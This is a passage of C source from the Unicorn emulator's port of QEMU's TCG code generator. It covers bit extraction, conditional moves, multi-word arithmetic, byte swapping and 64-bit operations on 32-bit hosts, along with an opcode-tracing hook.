ret, 32 - len); break; } } void tcg_gen_sextract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); /* Canonicalize certain special cases, even if extract is supported. */ if (ofs + len == 32) { tcg_gen_sari_i32(tcg_ctx, ret, arg, 32 - len); return; } if (ofs == 0) { switch (len) { case 16: tcg_gen_ext16s_i32(tcg_ctx, ret, arg); return; case 8: tcg_gen_ext8s_i32(tcg_ctx, ret, arg); return; } } if (TCG_TARGET_HAS_sextract_i32 && TCG_TARGET_extract_i32_valid(ofs, len)) { tcg_gen_op4ii_i32(tcg_ctx, INDEX_op_sextract_i32, ret, arg, ofs, len); return; } /* Assume that sign-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 16: if (TCG_TARGET_HAS_ext16s_i32) { tcg_gen_ext16s_i32(tcg_ctx, ret, arg); tcg_gen_sari_i32(tcg_ctx, ret, ret, ofs); return; } break; case 8: if (TCG_TARGET_HAS_ext8s_i32) { tcg_gen_ext8s_i32(tcg_ctx, ret, arg); tcg_gen_sari_i32(tcg_ctx, ret, ret, ofs); return; } break; } switch (len) { case 16: if (TCG_TARGET_HAS_ext16s_i32) { tcg_gen_shri_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext16s_i32(tcg_ctx, ret, ret); return; } break; case 8: if (TCG_TARGET_HAS_ext8s_i32) { tcg_gen_shri_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext8s_i32(tcg_ctx, ret, ret); return; } break; } tcg_gen_shli_i32(tcg_ctx, ret, arg, 32 - len - ofs); tcg_gen_sari_i32(tcg_ctx, ret, ret, 32 - len); } /* * Extract 32-bits from a 64-bit input, ah:al, starting from ofs. * Unlike tcg_gen_extract_i32 above, len is fixed at 32. */ void tcg_gen_extract2_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 al, TCGv_i32 ah, unsigned int ofs) { tcg_debug_assert(ofs <= 32); if (ofs == 0) { tcg_gen_mov_i32(tcg_ctx, ret, al); } else if (ofs == 32) { tcg_gen_mov_i32(tcg_ctx, ret, ah); } else if (al == ah) { tcg_gen_rotri_i32(tcg_ctx, ret, al, ofs); } else if (TCG_TARGET_HAS_extract2_i32) { tcg_gen_op4i_i32(tcg_ctx, INDEX_op_extract2_i32, ret, al, ah, ofs); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, al, ofs); tcg_gen_deposit_i32(tcg_ctx, ret, t0, ah, 32 - ofs, ofs); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_movcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 c1, TCGv_i32 c2, TCGv_i32 v1, TCGv_i32 v2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_mov_i32(tcg_ctx, ret, v1); } else if (cond == TCG_COND_NEVER) { tcg_gen_mov_i32(tcg_ctx, ret, v2); } else if (TCG_TARGET_HAS_movcond_i32) { tcg_gen_op6i_i32(tcg_ctx, INDEX_op_movcond_i32, ret, c1, c2, v1, v2, cond); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, cond, t0, c1, c2); tcg_gen_neg_i32(tcg_ctx, t0, t0); tcg_gen_and_i32(tcg_ctx, t1, v1, t0); tcg_gen_andc_i32(tcg_ctx, ret, v2, t0); tcg_gen_or_i32(tcg_ctx, ret, ret, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_add2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) { if (TCG_TARGET_HAS_add2_i32) { tcg_gen_op6_i32(tcg_ctx, INDEX_op_add2_i32, rl, rh, al, ah, bl, bh); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, t0, al, ah); tcg_gen_concat_i32_i64(tcg_ctx, t1, bl, bh); tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_sub2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) { uc_engine *uc = tcg_ctx->uc; if (TCG_TARGET_HAS_sub2_i32) { if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, tcg_ctx->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && hook->op_flags == 0) { // Calling tcg_gen_sub_i64 will cause infinite recursion. TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, t0, al, ah); tcg_gen_concat_i32_i64(tcg_ctx, t1, bl, bh); gen_uc_traceopcode(tcg_ctx, hook, t0, t1, 32, uc, tcg_ctx->pc_start); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } } tcg_gen_op6_i32(tcg_ctx, INDEX_op_sub2_i32, rl, rh, al, ah, bl, bh); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, t0, al, ah); tcg_gen_concat_i32_i64(tcg_ctx, t1, bl, bh); tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_mulu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_mulu2_i32) { tcg_gen_op4_i32(tcg_ctx, INDEX_op_mulu2_i32, rl, rh, arg1, arg2); } else if (TCG_TARGET_HAS_muluh_i32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_mul_i32, t, arg1, arg2); tcg_gen_op3_i32(tcg_ctx, INDEX_op_muluh_i32, rh, arg1, arg2); tcg_gen_mov_i32(tcg_ctx, rl, t); tcg_temp_free_i32(tcg_ctx, t); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t0, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_muls2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_muls2_i32) { tcg_gen_op4_i32(tcg_ctx, INDEX_op_muls2_i32, rl, rh, arg1, arg2); } else if (TCG_TARGET_HAS_mulsh_i32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_mul_i32, t, arg1, arg2); tcg_gen_op3_i32(tcg_ctx, INDEX_op_mulsh_i32, rh, arg1, arg2); tcg_gen_mov_i32(tcg_ctx, rl, t); tcg_temp_free_i32(tcg_ctx, t); } else if (TCG_TARGET_REG_BITS == 32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mulu2_i32(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative inputs. */ tcg_gen_sari_i32(tcg_ctx, t2, arg1, 31); tcg_gen_sari_i32(tcg_ctx, t3, arg2, 31); tcg_gen_and_i32(tcg_ctx, t2, t2, arg2); tcg_gen_and_i32(tcg_ctx, t3, t3, arg1); tcg_gen_sub_i32(tcg_ctx, rh, t1, t2); tcg_gen_sub_i32(tcg_ctx, rh, rh, t3); tcg_gen_mov_i32(tcg_ctx, rl, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, arg1); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_mulsu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_REG_BITS == 32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mulu2_i32(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative input for the signed arg1. */ tcg_gen_sari_i32(tcg_ctx, t2, arg1, 31); tcg_gen_and_i32(tcg_ctx, t2, t2, arg2); tcg_gen_sub_i32(tcg_ctx, rh, t1, t2); tcg_gen_mov_i32(tcg_ctx, rl, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_ext8s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext8s_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext8s_i32, ret, arg); } else { tcg_gen_shli_i32(tcg_ctx, ret, arg, 24); tcg_gen_sari_i32(tcg_ctx, ret, ret, 24); } } void tcg_gen_ext16s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext16s_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext16s_i32, ret, arg); } else { tcg_gen_shli_i32(tcg_ctx, ret, arg, 16); tcg_gen_sari_i32(tcg_ctx, ret, ret, 16); } } void tcg_gen_ext8u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext8u_i32, ret, arg); } else { tcg_gen_andi_i32(tcg_ctx, ret, arg, 0xffu); } } void tcg_gen_ext16u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext16u_i32, ret, arg); } else { tcg_gen_andi_i32(tcg_ctx, ret, arg, 0xffffu); } } /* Note: we assume the two high bytes are set to zero */ void tcg_gen_bswap16_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_bswap16_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_bswap16_i32, ret, arg); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext8u_i32(tcg_ctx, t0, arg); tcg_gen_shli_i32(tcg_ctx, t0, t0, 8); tcg_gen_shri_i32(tcg_ctx, ret, arg, 8); tcg_gen_or_i32(tcg_ctx, ret, ret, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_bswap32_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_bswap32_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_bswap32_i32, ret, arg); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, 0x00ff00ff); /* arg = abcd */ tcg_gen_shri_i32(tcg_ctx, t0, arg, 8); /* t0 = .abc */ tcg_gen_and_i32(tcg_ctx, t1, arg, t2); /* t1 = .b.d */ tcg_gen_and_i32(tcg_ctx, t0, t0, t2); /* t0 = .a.c */ tcg_gen_shli_i32(tcg_ctx, t1, t1, 8); /* t1 = b.d. */ tcg_gen_or_i32(tcg_ctx, ret, t0, t1); /* ret = badc */ tcg_gen_shri_i32(tcg_ctx, t0, ret, 16); /* t0 = ..ba */ tcg_gen_shli_i32(tcg_ctx, t1, ret, 16); /* t1 = dc.. */ tcg_gen_or_i32(tcg_ctx, ret, t0, t1); /* ret = dcba */ tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } } void tcg_gen_smin_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, ret, a, b, a, b); } void tcg_gen_umin_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, ret, a, b, a, b); } void tcg_gen_smax_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, ret, a, b, b, a); } void tcg_gen_umax_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, ret, a, b, b, a); } void tcg_gen_abs_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t, a, 31); tcg_gen_xor_i32(tcg_ctx, ret, a, t); tcg_gen_sub_i32(tcg_ctx, ret, ret, t); tcg_temp_free_i32(tcg_ctx, t); } /* 64-bit ops */ #if TCG_TARGET_REG_BITS == 32 /* These are all inline for TCG_TARGET_REG_BITS == 64. */ void tcg_gen_discard_i64(TCGContext *tcg_ctx, TCGv_i64 arg) { tcg_gen_discard_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg)); tcg_gen_discard_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, arg)); } void tcg_gen_mov_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg)); } void tcg_gen_movi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg) { tcg_gen_movi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), arg >> 32); } void tcg_gen_ld8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld8u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } void tcg_gen_ld8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld8s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); } void tcg_gen_ld16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld16u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } void tcg_gen_ld16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld16s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); } void tcg_gen_ld32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } void tcg_gen_ld32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); } void tcg_gen_ld_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { /* Since arg2 and ret have different types, they cannot be the same temporary */ #ifdef HOST_WORDS_BIGENDIAN tcg_gen_ld_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), arg2, offset); tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset + 4); #else tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_ld_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), arg2, offset + 4); #endif } void tcg_gen_st_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { #ifdef HOST_WORDS_BIGENDIAN tcg_gen_st_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, arg1), arg2, offset); tcg_gen_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset + 4); #else tcg_gen_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset); tcg_gen_st_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, arg1), arg2, offset + 4); #endif } void tcg_gen_and_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_and_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_and_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); } void tcg_gen_or_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_or_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_or_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); } void tcg_gen_xor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_xor_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_xor_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); } void tcg_gen_shl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { gen_helper_shl_i64(tcg_ctx, ret, arg1, arg2); } void tcg_gen_shr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { gen_helper_shr_i64(tcg_ctx, ret, arg1, arg2); } void tcg_gen_sar_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { gen_helper_sar_i64(tcg_ctx, ret, arg1, arg2); } void tcg_gen_mul_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { TCGv_i64 t0; TCGv_i32 t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mulu2_i32(tcg_ctx, TCGV_LOW(tcg_ctx, t0), TCGV_HIGH(tcg_ctx, t0), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_mul_i32(tcg_ctx, t1, TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); tcg_gen_add_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, t0), TCGV_HIGH(tcg_ctx, t0), t1); tcg_gen_mul_i32(tcg_ctx, t1, TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_add_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, t0), TCGV_HIGH(tcg_ctx, t0), t1); tcg_gen_mov_i64(tcg_ctx, ret, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } #endif /* TCG_TARGET_REG_SIZE == 32 */ void tcg_gen_addi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_add_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_subfi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg1, TCGv_i64 arg2) { if (arg1 == 0 && TCG_TARGET_HAS_neg_i64) { /* Don't recurse with tcg_gen_neg_i64. */ tcg_gen_op2_i64(tcg_ctx, INDEX_op_neg_i64, ret, arg2); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg1); tcg_gen_sub_i64(tcg_ctx, ret, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_subi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_sub_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_andi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_andi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), arg2); tcg_gen_andi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), arg2 >> 32); return; #else TCGv_i64 t0; /* Some cases can be optimized here. */ switch (arg2) { case 0: tcg_gen_movi_i64(tcg_ctx, ret, 0); return; case -1: tcg_gen_mov_i64(tcg_ctx, ret, arg1); return; case 0xff: /* Don't recurse with tcg_gen_ext8u_i64. */ if (TCG_TARGET_HAS_ext8u_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext8u_i64, ret, arg1); return; } break; case 0xffff: if (TCG_TARGET_HAS_ext16u_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext16u_i64, ret, arg1); return; } break; case 0xffffffffu: if (TCG_TARGET_HAS_ext32u_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext32u_i64, ret, arg1); return; } break; } t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_and_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_ori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ori_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), arg2); tcg_gen_ori_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), arg2 >> 32); return; #else /* Some cases can be optimized here. */ if (arg2 == -1) { tcg_gen_movi_i64(tcg_ctx, ret, -1); } else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_or_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_xori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_xori_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), arg2); tcg_gen_xori_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), arg2 >> 32); return; #else /* Some cases can be optimized here. */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else if (arg2 == -1 && TCG_TARGET_HAS_not_i64) { /* Don't recurse with tcg_gen_not_i64. */ tcg_gen_op2_i64(tcg_ctx, INDEX_op_not_i64, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_xor_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } #if TCG_TARGET_REG_BITS == 32 static inline void tcg_gen_shifti_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned c, bool right, bool arith) { tcg_debug_assert(c < 64); if (c == 0) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1)); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1)); } else if (c >= 32) { c -= 32; if (right) { if (arith) { tcg_gen_sari_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), 31); } else { tcg_gen_shri_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } } else { tcg_gen_shli_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), c); tcg_gen_movi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), 0); } } else if (right) { if (TCG_TARGET_HAS_extract2_i32) { tcg_gen_extract2_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), c); } else { tcg_gen_shri_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), c); tcg_gen_deposit_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), 32 - c, c); } if (arith) { tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); } else { tcg_gen_shri_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); } } else { if (TCG_TARGET_HAS_extract2_i32) { tcg_gen_extract2_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), 32 - c); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, TCGV_LOW(tcg_ctx, arg1), 32 - c); tcg_gen_deposit_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), t0, 